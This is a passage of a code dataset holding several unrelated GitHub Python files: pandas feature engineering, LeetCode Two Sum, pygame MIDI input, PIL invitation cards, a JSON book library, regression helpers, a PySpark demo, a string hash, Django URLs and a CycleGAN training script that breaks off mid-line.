-- seasonality\n seasons1 = ['2011-02', '2011-03', '2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10', '2011-11']\n seasons2 = ['2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10', '2011-11']\n seasons3 = ['2011-09', '2011-10', '2011-11']\n\n # -- cyclicity\n cycle1 = ['2011-02', '2011-04', '2011-06', '2011-08', '2011-10']\n cycle2 = ['2010-09', '2010-12', '2011-03', '2011-06', '2011-09']\n cycle3 = ['2010-12']\n\n # -- weak-periodicity\n weak_cycle = ['2010-01', '2010-11', '2010-12', '2011-01']\n\n df_ret = pd.DataFrame()\n time_list_bundle = [seasons1, seasons2, seasons3, cycle1, cycle2, cycle3, weak_cycle]\n attribute_names = ['seasonality1', 'seasonality2', 'seasonality3', 'cyclicity1', 'cyclicity2', 'cyclicity3', 'weak_cyclicity']\n\n # -- For each category, apply agg independently\n for category in categories:\n categoric_df = pd.DataFrame()\n\n for time_list, attribute_name in zip(time_list_bundle, attribute_names):\n now_df = df[category].loc[:, time_list]\n\n # -- Aggregating (sum, skew)\n attribute_sum = now_df.sum(axis=1)\n attribute_skew = now_df.skew(axis=1)\n\n categoric_df[f\"{category}_{attribute_name}_sum\"] = attribute_sum\n categoric_df[f\"{category}_{attribute_name}_skew\"] = attribute_skew\n\n df_ret = pd.concat([df_ret, categoric_df], axis=1)\n\n return df_ret\n\n\ndef calculate_date_diff(df_original, start_date, target_date):\n \"\"\" Generate the gap between first purchase date and last purchase date as feature.\n Refund data is NOT considered as purchase.\n\n Args:\n df_original (pd.DataFrame): monthly frame\n start_date (str): start date(2009-12 or 2010-01)\n target_date (str): target date\n\n Returns:\n date diff\n default: (last purchase date) - (first purchase date)\n If there is only one purchase date, (target date) - (first purchase date)\n \"\"\"\n\n df = df_original.copy()\n\n # -- Convert each data to pd.Timestamp\n start_date = pd.to_datetime(start_date)\n target_date = pd.to_datetime(target_date)\n \n # -- Calculate date diff for each row(customer)\n dt_diff = []\n for customer_id, datas in df.iterrows():\n start = start_date\n end = start_date\n \n for date, value in datas.items():\n if value > 0 and start == start_date:\n start = pd.to_datetime(date)\n if value > 0:\n end = pd.to_datetime(date)\n \n # -- When only one purchase data exist\n if start == end:\n end = pd.to_datetime(target_date) \n dt_diff.append(int((end - start).total_seconds()))\n\n dt_diff = 
np.array(dt_diff).reshape(-1, 1)\n\n # -- Normalize\n scaler = StandardScaler()\n dt_diff = scaler.fit_transform(dt_diff)\n\n return dt_diff\n\n\ndef apply_agg_to_feature(df_original, categories, start_date=None, target_date=None):\n \"\"\" Apply aggregate function to monthly data.\n 1. Generate monthly cumsum columns\n 2. Apply aggregation(skew) to original monthly data and of cumsum data. \n 3. (optional) Call 'calculate_date_diff' method\n\n Args:\n df_original (pd.DataFrame): monthly frame\n categories: aggregated categories\n\n (optional, when want to add 'date_diff' feature)\n start_date (str): start date(2009-12 or 2010-01)\n target_date (str): target date\n\n Returns:\n aggregated features\n \"\"\"\n\n df = df_original.copy()\n\n # -- Apply cumsum/skew\n df_ret = df.copy()\n for category in categories:\n df_skew = df[category].skew(axis=1).rename(f'{category}_skew')\n df_cumsum = df[category].cumsum(axis=1)\n df_cumsum.columns = [f\"cum_{category}_{x}\" for x in df_cumsum.columns]\n cumsum_skew = df_cumsum.skew(axis=1).rename(f'{category}_cumsum_skew')\n\n df_ret = pd.concat([df_ret, df_skew, df_cumsum, cumsum_skew], axis=1)\n df_ret = df_ret.rename(columns={'skew': f'{category}_skew',\n 'cumsum': f'{category}_cumsum',\n 'cumsum_skew': f'{category}_cumsum_skew'})\n\n # -- If start_date and target_date exists, generate date_diff feature additionally\n if start_date and target_date:\n date_diff = calculate_date_diff(df['total'], start_date=start_date, target_date=target_date)\n df_ret['date_diff'] = date_diff\n\n return df_ret\n\n\ndef convert_multi_index_to_single(df_original):\n \"\"\" Convert multi-index columns to single index.\n\n Args:\n df_original (pd.DataFrame): monthly frame\n\n Returns:\n monthly frame with single-index columns.\n ex) ('total', '2011-10') => 'total_2011-10'\n \"\"\"\n\n df = df_original.copy()\n\n new_columns = []\n for column in df.columns:\n new_column = column\n\n # -- If multi-index\n if isinstance(column, tuple):\n new_column = f\"{column[0]}_{column[1]}\"\n new_columns.append(new_column)\n df.columns = new_columns\n\n return df\n\n\ndef feature_engineering(df_original, target_date):\n \"\"\" Date feature engineering\n 1. Drop unnecessary columns(features)\n 2. Make monthly frame\n 3. Feature extracting\n 4. 
Imputing\n \n Args:\n df_original (pd.DataFrame): raw frame\n target_date (str): target date (i.e., '2011-12')\n\n Returns:\n preprocessed data(Split as train and test)\n train label(status, total)\n \"\"\"\n\n df = df_original.copy()\n\n # -- Basic preprocessing\n df.order_date = pd.to_datetime(df.order_date)\n df['ym'] = pd.to_datetime(df['order_date']).dt.strftime('%Y-%m')\n df.drop(['order_id', 'product_id', 'description', 'price', 'country'], axis=1, inplace=True)\n\n # -- Calculate period of train and test and apply it.\n d = datetime.datetime.strptime(target_date, \"%Y-%m\")\n prev_date = (d - relativedelta(months=1)).strftime(\"%Y-%m\")\n init_date = df.order_date.min().strftime(\"%Y-%m\")\n\n train = df[df['ym'] < prev_date]\n test = df[(df['ym'] < target_date) & (df['ym'] > init_date)]\n\n # -- Generate monthly frame and train label\n categories = ['total', 'quantity']\n monthly_frame = generate_monthly_frame(df, categories)['total']\n train_data = generate_monthly_frame(train, categories)\n test_data = generate_monthly_frame(test, categories)\n\n status_label = generate_label_status(monthly_frame, prev_date)\n total_label = generate_label_total(monthly_frame)['total_label']\n\n # -- Denoising\n train_data[train_data < STATUS_THRES] = 0\n test_data[test_data < STATUS_THRES] = 0\n\n # -- Feature extracting\n train_ts = time_series_processing(train_data, categories, train=True)\n test_ts = time_series_processing(test_data, categories, train=False)\n \n train_agg = apply_agg_to_feature(train_data, categories, start_date='2009-12', target_date='2011-11')\n test_agg = apply_agg_to_feature(test_data, categories, start_date='2010-01', target_date='2011-12')\n\n X_train = pd.merge(train_ts, train_agg, on=['customer_id'], how='left')\n X_train = pd.merge(X_train, status_label, on=['customer_id'], how='left')\n X_test = pd.merge(test_ts, test_agg, on=['customer_id'], how='left')\n \n # -- For convenience(ignoreable)\n X_test['customer_id'] = X_test.index\n X_test = X_test[[X_test.columns.values[-1]] + list(X_test.columns.values[:-1])]\n X_test.reset_index(drop=True).sort_values(by='customer_id')\n\n # -- Imputing(for test data)\n checker = X_train['customer_id'].isin(X_test.index)\n imputed = X_train[~checker].drop(columns=['status_label'])\n test_cols = {x: y for x, y in zip(X_train.columns, X_test.columns)}\n X_test = X_test.append(imputed.rename(columns=test_cols)).sort_values(by='customer_id')\n\n # -- Detect multi-index and convert them to single\n X_train = convert_multi_index_to_single(X_train)\n X_test = convert_multi_index_to_single(X_test)\n\n return X_train.drop(columns=['customer_id', 'status_label']), \\\n X_test.drop(columns=['customer_id']), \\\n X_train['status_label'], \\\n total_label\n\n\nif __name__ == '__main__':\n print('data_dir', data_dir)\n","repo_name":"bcaitech1/p2-tab-olenmg","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":13312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9136328477","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]: \n mem = {}\n \n for key, value in enumerate(nums):\n diff = target - value\n \n if diff in mem:\n return [mem[diff], key]\n else:\n mem[value] = key\n \n return []\n","repo_name":"Amyth07/Leetcode","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5959718242","text":"import sys\nimport os\n\nimport pygame\nimport pygame.midi\nfrom pygame.locals import *\n\npygame.init()\npygame.fastevent.init()\nevent_get = pygame.fastevent.get\nevent_post = pygame.fastevent.post\n\npygame.midi.init()\n\ninput_id = pygame.midi.get_default_input_id()\n\nprint (\"using input_id :%s:\" % input_id)\ni = pygame.midi.Input( input_id )\n\npygame.display.set_mode((1,1))\n\n\n\ngoing = True\nwhile going:\n events = event_get()\n for e in events:\n if e.type in [QUIT]:\n going = False\n if e.type in [KEYDOWN]:\n going = False\n if e.type in [pygame.midi.MIDIIN]:\n print (e)\n\n if i.poll():\n midi_events = i.read(10)\n # convert them into pygame events.\n midi_evs = pygame.midi.midis2events(midi_events, i.device_id)\n for m_e in midi_evs:\n event_post( m_e )\ndel i\npygame.midi.quit()\n","repo_name":"hgijeon/the_PLAY","sub_path":"test_midi.py","file_name":"test_midi.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31514866310","text":"import os \nfrom PIL import Image\nfrom PIL import ImageDraw \nfrom PIL import ImageFont\n\n\ndef create_card(name):\n\tcard = Image.new('RGBA', (360, 288), 'white')\n\tflower = Image.open('zophie.png')\n\tcard.paste(flower, (10, 40))\n\tcut_guide = Image.new('RGBA', (364, 292), 'black')\n\tcut_guide.paste(card, (2, 2))\n\n\tdraw_obj = ImageDraw.Draw(cut_guide)\n\tfonts_folder = 'user/share/fonts/TTF'\n\tcustom_font = ImageFont.truetype(os.path.join(fonts_folder, 'ariel.ttf'), 72)\n\tdraw_obj.text((120, 100), name, fill='blue', font=custom_font)\n\tcut_guide.save('{}-invite.png'.format(name))\n\n\nwith open('guests.txt') as f:\n\tguests = f.readlines()\nprint(guests)\n\nfor guest in guests:\n\tcreate_card(guest)\n\nprint('All invations cards have been sent.')","repo_name":"francisliujia/codelife","sub_path":"python_code/textbooks/automate_the_boring_stuff_with_python/image_cards.py","file_name":"image_cards.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15292751245","text":"import json\nfrom functools import total_ordering\nfrom time import process_time_ns\n\n@total_ordering\nclass Livros:\n def __init__(self, nome, autor, data_publicacao):\n self._nome = nome\n self._autor = autor\n self._data_publicacao = data_publicacao\n \n def __str__(self):\n return f'Nome do livro: {self._nome} - Autor: {self._autor} - Data publicação: {self._data_publicacao}'\n \n # \n def __eq__(self, outro_livro):\n if isinstance(outro_livro, Livros):\n return ((self._nome == outro_livro._nome) and \n (self._autor == outro_livro._autor) and \n (self._data_publicacao == outro_livro._data_publicacao))\n \n return False\n \n def __lt__(self, outro_livro):\n return self._data_publicacao > outro_livro._data_publicacao\n \n @property\n def nome(self):\n return self._nome\n \n \nclass Biblioteca():\n def pegarLivros(self):\n livros = []\n \n # with open('livros.json', \"r\") as arquivo:\n # for linha in arquivo:\n # linha = linha.strip()\n # livros_montagem = linha.split(' - ')\n # if [0, 1, 2] in livros_montagem: \n # book = Livros(livros_montagem[0], livros_montagem[1], livros_montagem[2])\n # livros.append(book)\n # else:\n # print(\"erro\")\n \n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for data in texto_json:\n book = Livros(data['Nome'], data['Autor'], data['Data de publicação'])\n livros.append(book)\n \n return livros\n \n def listarLivros(self):\n lista_livros = self.pegarLivros()\n print(\"\\nListando os Livros\\n\")\n for livro in sorted(lista_livros):\n print(livro)\n \n def adicionarLivros(self):\n print(\"Bem vindo a Biblioteca pessoal, digite o livro que você quer cadastrar: \")\n nome = \"\"\n autor = \"\"\n data_de_publicacao = \"\"\n while(nome == \"\" or autor == \"\" or data_de_publicacao == \"\"):\n nome = input(\"Digite o nome do seu livro: \")\n autor = input(\"Digite o autor do seu livro: \")\n data_de_publicacao = input(\"Digite a data de publicação do seu livro: \")\n \n nome = nome.title().strip()\n autor = autor.title().strip()\n data_de_publicacao = data_de_publicacao.strip()\n \n \n list = []\n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for line in texto_json:\n list.append(line)\n \n \n with open('livros.json', \"w\", encoding=\"utf-8\") as arquivo:\n livro_dict = {\"Nome\": nome, \"Autor\": autor, \"Data de publicação\": data_de_publicacao}\n list.append(livro_dict)\n text_json = json.dumps(list)\n arquivo.write(text_json)\n \n print(\"\\nLivro adicionado com sucesso :)\")\n \n def removerLivros(self):\n livro_remove_nome = input(\"Digite o nome do livro que você quer remover: \")\n livro_remove_autor = input(\"Digite o autor do livro que você quer remover: \")\n livro_remove_data = input(\"Digite a data de publicação do livro que você quer remover: \")\n \n livro_remove_nome = livro_remove_nome.title().strip()\n livro_remove_autor = livro_remove_autor.title().strip()\n livro_remove_data = livro_remove_data.title().strip()\n \n book = Livros(livro_remove_nome, livro_remove_autor, livro_remove_data)\n \n lista_livros = self.pegarLivros()\n cont = 0\n autorizado = False\n for livro in lista_livros:\n if (book == livro):\n lista_livros.pop(cont)\n self.removeLinha(cont)\n autorizado = True\n \n \n cont += 1\n\n if (not autorizado):\n pergunta = input(\"Livro não encontrado, deseja fazer a operação de novo? 
('SIM') ou ('Não')\")\n pergunta = pergunta.strip().title()\n if (pergunta != \"Não\" and pergunta != \"Nao\"):\n self.removerLivros()\n\n print(\"\\nOperação de remoção completa :)\")\n \n def removeLinha(self, indice):\n # with open('livros.txt', \"r\") as arquivo:\n # livroLinhas = arquivo.readlines()\n \n # livroLinhas.pop(indice)\n \n # with open(\"livros.txt\", \"w\") as f:\n # for line in livroLinhas:\n # f.write(line)\n \n list = []\n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for line in texto_json:\n if line != texto_json[indice]:\n list.append(line)\n \n with open('livros.json', \"w\", encoding=\"utf-8\") as arquivo:\n text_json = json.dumps(list)\n arquivo.write(text_json)\n \n \n\n","repo_name":"Kawhan/aprendizadoISYSTEMS","sub_path":"backend/treinamentoPython/cursoPython/projetoBiblioteca/livrosClass/livrosCompletJSON/jsonlibrary.py","file_name":"jsonlibrary.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70742169180","text":"import pandas as pd \nimport numpy as np\nfrom scipy.optimize import curve_fit\n# import matplotlib.pyplot as plt\n\ndef linReg(startYear, userInput, existingData):\n years, points = [], []\n userInput = sorted(userInput, key=lambda x: x['Year'])\n existingData = sorted(existingData, key=lambda x: x['Year'])\n for elem in existingData:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n for elem in userInput:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n data = pd.DataFrame(np.array([years, points]).T, columns=['Year', 'CO2Emissions'])\n x = data['Year']\n y = data['CO2Emissions'] \n lin_model = np.polyfit(x, y, 1)\n coef, intcp = lin_model\n\n pred_lin_vals = []\n for year in range(startYear, 2050):\n val = intcp + coef*year\n if val >= 0:\n pred_lin_vals.append({\"Year\": year, \"CO2Emissions\": val})\n return pred_lin_vals\n\ndef expReg(startYear, userInput, existingData):\n def func(x, a, b, c):\n return a * np.exp(b * x) + c\n\n years, points = [], []\n userInput = sorted(userInput, key=lambda x: x['Year'])\n existingData = sorted(existingData, key=lambda x: x['Year'])\n for elem in existingData:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n for elem in userInput:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n data = pd.DataFrame(np.array([years, points]).T, columns=['Year', 'CO2Emissions'])\n x = data['Year']\n y = data['CO2Emissions']\n\n popt, pcov = curve_fit(func, x, y, p0=(1,1e-6,1), maxfev=10000)\n pred_exp_vals = []\n for year in range(startYear, 2050):\n val = func(year, *popt)\n if val >= 0:\n pred_exp_vals.append({\"Year\": year, \"CO2Emissions\": val})\n return pred_exp_vals\n","repo_name":"mamn2/ClimateRegressionPredictor","sub_path":"Database/basicRegs.py","file_name":"basicRegs.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34894399266","text":"from pyspark.sql import SparkSession\nspark=SparkSession.builder.getOrCreate()\nsc=spark.sparkContext\nrdd1=sc.textFile(\"hdfs://localhost:54310/user/hduser/custs\",4)\n#rdd1=rdd1.repartition(4)\nrdd2=rdd1.map(lambda x:x.split(\",\"))\nprint(\"sample customers are \")\nprint(rdd2.take(10))\nprint(\"total customers are \")\nprint(rdd2.count())\nrdd3=rdd2.map(lambda x:(int(x[0]),int(x[3]),x[4])).filter(lambda x:x[1]>60)\nrdd3.coalesce(1).saveAsTextFile(\"hdfs:/user/hduser/custoutdata2\")\n\nspark.sparkContext.setLogLevel(\"INFO\")\nrdd1=spark.sparkContext.textFile(\"/user/hduser/empdata2/\")\nrdd1.cache()\nrdd2=rdd1.map(lambda x:x.split(\",\"))\nlocal_python_var_kept_in_driver=rdd2.collect()\n#collect action will collect the data from rdd (executors) to driver or collect used for\n# converting the rdd to normal values\nprint(local_python_var_kept_in_driver)\nrdd3=rdd2.filter(lambda x:len(x)==5)\ndf1=rdd3.toDF()\ndf1.cache()\ndf1.select(\"*\").show(4)\ndf1.createOrReplaceTempView(\"view1\")\nspark.sql(\"describe view1\").show()\nspark.sql(\"select _1,_2,_3 from view1\").write.mode(\"overwrite\").orc(\"/user/hduser/empdataorc\")\nspark.read.orc(\"/user/hduser/empdataorc\").show()\nprint(\"end of spark core, sql application\")\n\n#spark-submit --master yarn --executor-memory 2g --num-executors 2 --deploy-mode client /home/hduser/core_submit.py\n#spark-submit --master yarn --executor-memory 2g --num-executors 2 --deploy-mode cluster /home/hduser/core_submit.p\n","repo_name":"sundarbee/Spark_Learning","sub_path":"Python_Pyspark_Programs/wd28Project/SparkProg/Core/sample_deploy.py","file_name":"sample_deploy.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28648625523","text":"_seed = 131\n\ndef bkdrhash(str):\n hashnum = 0\n sz = len(str)\n for i in range(sz):\n hashnum = (hashnum * _seed) + ord(str[i])\n \n return hashnum & 0x7FFFFFFF\n\nif __name__ == \"__main__\":\n print(bkdrhash('hello world'))","repo_name":"lvchy/ClientTools","sub_path":"UABTools/bkdrhash.py","file_name":"bkdrhash.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9659988157","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'videodata_gen.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'videodata_app.views.home', name='home'),\n url(r'^viewer/(?P[\\w-]+)/$', 'videodata_app.views.viewer_video', name='viewer'),\n url(r'^tagging/(?P[\\w-]+)/$', 'videodata_app.views.tagging', name='tagging'),\n # url(r'^tagging/(?P[\\w-]+)/(?P[\\w-]+)$', 'videodata_app.views.save_tag', name='save_tag'),\n url(r'^tagging/(?P[\\w-]+)/crear_tag/$', 'videodata_app.views.save_tag', name='crear_tag'),\n)\n","repo_name":"cbertelegni/videodata","sub_path":"videodata_gen/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"74643990940","text":"import numpy as np\nfrom tqdm import trange, tqdm\nimport glob\nimport h5py\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.preprocessing import image\nimport random\nfrom models import components, mae_loss, mse_loss\nimport scipy.misc\n# Avoid crash on non-X linux sessions (tipically servers) when plotting images\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport gc\nimport time\nfrom glob import glob\n\n# Images size\nw = 256\nh = 256\n\n# Cyclic consistency factor\n\nlmda = 10\n\n# Optimizer parameters\n\nlr = 0.0002\nbeta_1 = 0.5\nbeta_2 = 0.999\nepsilon = 1e-08\n\n# Setting image format as (channels, height, width)\nK.set_image_dim_ordering('th')\n\ndisc_a_history = []\ndisc_b_history = []\n\ngen_a2b_history = {'bc': [], 'mae': []}\ngen_b2a_history = {'bc': [], 'mae': []}\n\ngen_b2a_history_new = []\ngen_a2b_history_new = []\ncycle_history = []\n\nmodel_save_folder = \"models\"\n\n\n# Data loading\n\ndef loadImage(path, h, w):\n '''Load single image from specified path'''\n if path in cache:\n return cache[path]\n img = image.load_img(path)\n img = img.resize((w, h))\n x = image.img_to_array(img)\n cache[path] = x\n return x\n\ndef loadImagesFromDataset(h, w, dataset, use_hdf5=False):\n '''Return a tuple (trainA, trainB, testA, testB)\n containing numpy arrays populated from the\n test and train set for each part of the cGAN'''\n\n if (use_hdf5):\n path = \"./datasets/processed/\" + dataset + \"_data.h5\"\n data = []\n print('\\n', '-' * 15, 'Loading data from dataset', dataset, '-' * 15)\n with h5py.File(path, \"r\") as hf:\n for set_name in tqdm([\"trainA_data\", \"trainB_data\", \"testA_data\", \"testB_data\"]):\n data.append(hf[set_name][:].astype(np.float32))\n\n return (set_data for set_data in data)\n\n else:\n path = \"./datasets/\" + dataset\n print(path)\n train_a = glob.glob(path + \"/trainA/*.jpg\")\n train_b = glob.glob(path + \"/trainB/*.jpg\")\n test_a = glob.glob(path + \"/testA/*.jpg\")\n test_b = glob.glob(path + \"/testB/*.jpg\")\n\n print(\"Import trainA\")\n if dataset == \"nike2adidas\" or (\"adiedges\" in dataset):\n tr_a = np.array([loadImage(p, h, w) for p in tqdm(train_a[:1000])])\n else:\n tr_a = np.array([loadImage(p, h, w) for p in tqdm(train_a)])\n\n print(\"Import trainB\")\n if dataset == \"nike2adidas\" or (\"adiedges\" in dataset):\n tr_b = np.array([loadImage(p, h, w) for p in tqdm(train_b[:1000])])\n else:\n tr_b = np.array([loadImage(p, h, w) for p in tqdm(train_b)])\n\n print(\"Import testA\")\n ts_a = np.array([loadImage(p, h, w) for p in tqdm(test_a)])\n\n print(\"Import testB\")\n ts_b = np.array([loadImage(p, h, w) for p in tqdm(test_b)])\n\n return tr_a, tr_b, ts_a, ts_b\ncache = dict()\nn_batches = -1\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\ndef load_batch(dataset, batch_size=1, is_testing=False, break_img=False):\n data_type = \"train\" if not is_testing else \"test\"\n a = f'./datasets/{dataset}/{data_type}A/*'\n b = f'./datasets/{dataset}/{data_type}B/*'\n path_A = None\n path_B = None\n if a in cache:\n path_A = cache[a]\n else:\n path_A = glob(a)\n\n if b in cache:\n path_B = cache[b]\n else:\n path_B = glob(b)\n\n n_batches = int(min(len(path_A), len(path_B)) / batch_size)\n total_samples = n_batches * batch_size\n\n # Sample n_batches * batch_size from each path list so that model sees all\n # samples from both domains\n path_A = np.random.choice(path_A, total_samples, replace=False)\n path_B = 
np.random.choice(path_B, total_samples, replace=False)\n\n for i in range(n_batches-1):\n start_time = current_milli_time()\n batch_A = path_A[i*batch_size:(i+1)*batch_size]\n batch_B = path_B[i*batch_size:(i+1)*batch_size]\n imgs_A, imgs_B = [], []\n for img_A, img_B in zip(batch_A, batch_B):\n img_B = load_img2(img_B, break_img=break_img)\n img_A = load_img2(img_A, break_img=break_img)\n\n\n imgs_A.append(img_A)\n imgs_B.append(img_B)\n\n imgs_A = np.array(imgs_A)/127.5 - 1.\n imgs_B = np.array(imgs_B)/127.5 - 1.\n\n yield imgs_A, imgs_B, current_milli_time() - start_time\n\ndef load_img2( path, break_img):\n name = path\n if name in cache:\n img = cache[name]\n else:\n img = loadImage(path, h , w)\n cache[name] = img\n return img\n# Create a wall of generated images\ndef plotGeneratedImages(epoch, dataset, batch_size, generator_a2b, generator_b2a, examples=6):\n\n a1, b1, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a2, b2, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a3, b3, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a4, b4, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a5, b5, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a6, b6, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n set_a= np.array([a1[0],a2[0],a3[0],a4[0],a5[0],a6[0]])\n set_b= np.array([b1[0],b2[0],b3[0],b4[0],b5[0],b6[0]])\n true_batch_a = set_a[np.random.randint(0, set_a.shape[0], size=examples)]\n true_batch_b = set_b[np.random.randint(0, set_b.shape[0], size=examples)]\n\n # Get fake and cyclic images\n generated_a2b = generator_a2b.predict(true_batch_a)\n cycle_a = generator_b2a.predict(generated_a2b)\n generated_b2a = generator_b2a.predict(true_batch_b)\n cycle_b = generator_a2b.predict(generated_b2a)\n\n k = 0\n\n # Allocate figure\n plt.figure(figsize=(w / 10, h / 10))\n\n for output in [true_batch_a, generated_a2b, cycle_a, true_batch_b, generated_b2a, cycle_b]:\n output = (output + 1.0) / 2.0\n for i in range(output.shape[0]):\n plt.subplot(examples, examples, k * examples + (i + 1))\n img = output[i].transpose(1, 2, 0) # Using (ch, h, w) scheme needs rearranging for plt to (h, w, ch)\n # print(img.shape)\n plt.imshow(img)\n plt.axis('off')\n plt.tight_layout()\n k += 1\n plt.savefig(\"images/epoch\" + str(epoch) + \".png\")\n plt.close()\n\n\n# Plot the loss from each batch\n\ndef plotLoss_new():\n plt.figure(figsize=(10, 8))\n plt.plot(disc_a_history, label='Discriminator A loss')\n plt.plot(disc_b_history, label='Discriminator B loss')\n plt.plot(gen_a2b_history_new, label='Generator a2b loss')\n plt.plot(gen_b2a_history_new, label='Generator b2a loss')\n # plt.plot(cycle_history, label=\"Cyclic loss\")\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('images/cyclegan_loss.png')\n plt.close()\n\n\ndef saveModels(epoch, dataset, genA2B, genB2A, discA, discB):\n print(\"Saving Model...\")\n genA2B.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorA2B.h5')\n genB2A.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorB2A.h5')\n discA.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorA.h5')\n discB.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorBh.h5')\n print(\"Model Saved!\")\n\n\ndef loadModels(epoch, dataset, genA2B, genB2A, discA, discB):\n try:\n genA2B.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorA2B.h5')\n genB2A.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorB2A.h5')\n 
discA.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorA.h5')\n discB.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorB.h5')\n except Exception as e:\n print(f\"Failed to load model: {e}\")\n\n\n# Training\n\ndef train(epochs, batch_size, dataset, baselr, use_pseudounet=False, use_unet=False, use_decay=False, plot_models=True,\n end_of_epoch_callback=None):\n if end_of_epoch_callback is not None:\n end_of_epoch_callback()\n\n # Load data and normalize\n # x_train_a, x_train_b, x_test_a, x_test_b = loadImagesFromDataset(h, w, dataset, use_hdf5=False)\n # x_train_a = (x_train_a.astype(np.float32) - 127.5) / 127.5\n # x_train_b = (x_train_b.astype(np.float32) - 127.5) / 127.5\n # x_test_a = (x_test_a.astype(np.float32) - 127.5) / 127.5\n # x_test_b = (x_test_b.astype(np.float32) - 127.5) / 127.5\n\n batchCount_a = n_batches\n batchCount_b = n_batches\n\n # Train on same image amount, would be best to have even sets\n batchCount = min([batchCount_a, batchCount_b])\n\n print('\\nEpochs:', epochs)\n print('Batch size:', batch_size)\n print('Batches per epoch: ', batchCount, \"\\n\")\n\n # Retrieve components and save model before training, to preserve weights initialization\n disc_a, disc_b, gen_a2b, gen_b2a = components(w, h, pseudounet=use_pseudounet, unet=use_unet, plot=plot_models)\n\n\n # LOAD AND SAVE ====\n loadModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n # saveModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n\n # Initialize fake images pools\n pool_a2b = []\n pool_b2a = []\n\n # Define optimizers\n adam_disc = Adam(lr=baselr, beta_1=0.5)\n adam_gen = Adam(lr=baselr, beta_1=0.5)\n\n # Define image batches\n true_a = gen_a2b.inputs[0]\n true_b = gen_b2a.inputs[0]\n\n fake_b = gen_a2b.outputs[0]\n fake_a = gen_b2a.outputs[0]\n\n fake_pool_a = K.placeholder(shape=(None, 3, h, w))\n fake_pool_b = K.placeholder(shape=(None, 3, h, w))\n\n # Labels for generator training\n y_fake_a = K.ones_like(disc_a([fake_a]))\n y_fake_b = K.ones_like(disc_b([fake_b]))\n\n # Labels for discriminator training\n y_true_a = K.ones_like(disc_a([true_a])) * 0.9\n y_true_b = K.ones_like(disc_b([true_b])) * 0.9\n\n fakelabel_a2b = K.zeros_like(disc_b([fake_b]))\n fakelabel_b2a = K.zeros_like(disc_a([fake_a]))\n\n # Define losses\n disc_a_loss = mse_loss(y_true_a, disc_a([true_a])) + mse_loss(fakelabel_b2a, disc_a([fake_pool_a]))\n disc_b_loss = mse_loss(y_true_b, disc_b([true_b])) + mse_loss(fakelabel_a2b, disc_b([fake_pool_b]))\n\n gen_a2b_loss = mse_loss(y_fake_b, disc_b([fake_b]))\n gen_b2a_loss = mse_loss(y_fake_a, disc_a([fake_a]))\n\n cycle_a_loss = mae_loss(true_a, gen_b2a([fake_b]))\n cycle_b_loss = mae_loss(true_b, gen_a2b([fake_a]))\n cyclic_loss = cycle_a_loss + cycle_b_loss\n\n # Prepare discriminator updater\n discriminator_weights = 